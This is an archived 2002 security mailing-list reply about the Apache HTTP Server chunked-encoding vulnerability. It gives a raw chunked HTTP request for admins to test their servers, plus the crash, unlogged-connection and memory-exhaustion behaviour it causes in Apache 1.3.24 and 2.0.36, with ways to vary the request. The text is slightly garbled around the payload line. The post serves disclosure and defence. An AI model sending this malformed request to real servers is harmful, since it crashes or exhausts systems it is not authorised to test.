Re: ISS Advisory: Remote Compromise Vulnerability in Apache HTTP Server

From: Joe Testa (jtestaat_private)
Date: Wed Jun 19 2002 - 05:26:31 PDT

  • Next message: Peter Mueller: "RE: procmail heap overflow"

    Hash: SHA1
    Greetings sweaty Apache admins,
        Now that the Apache group has released official fixes, here is a
    test string that can be used to check if your server is vulnerable:
    POST /x.html HTTP/1.1
    Host: 192.168.x.x
    Transfer-Encoding: chunked
    Rapid 7
    Here is the behavior that the above string will produce:
        Apache 1.3.24:
            Connection is instantly dropped.
            The connection is not logged in the access_log, but the following
                will appear in the error_log:
            [Mon Jun 17 16:12:25 2002] [notice] child pid 21452 exit signal
            Segmentation fault (11)
        Apache 2.0.36:
            No effect!  Hmmm...
        Apache 1.3.24:
            Connection is instantly dropped.
            The connection is *not* logged in access_log nor error_log!
        Apache 2.0.36:
            Connection appears to hang while child thread consumes all
                available memory.  After a minute or two, the OS reports that
                virtual memory is exhausted via a server-side dialog box.
                A remote client cannot determine the result of this test
                because the connection remains open until the dialog box is
                dismissed.  A non-vulnerable server will not drop the
                connection because it is waiting to receive 2 gigabytes of
                legitimately chunked data.
            The connection is not logged in access_log, but the following will
                appear in the error_log:
            [Tue Jun 18 09:16:34 2002] [notice] Parent: child process exited
            with status 3221225477 -- Restarting.
    - ---
        Note that in the test string above, you can interchange the "POST"
    with "GET", and you can use any hex value between 80000000 and
    FFFFFFFF for the chunk size.
        Comments are much appreciated.
        - Joe Testa
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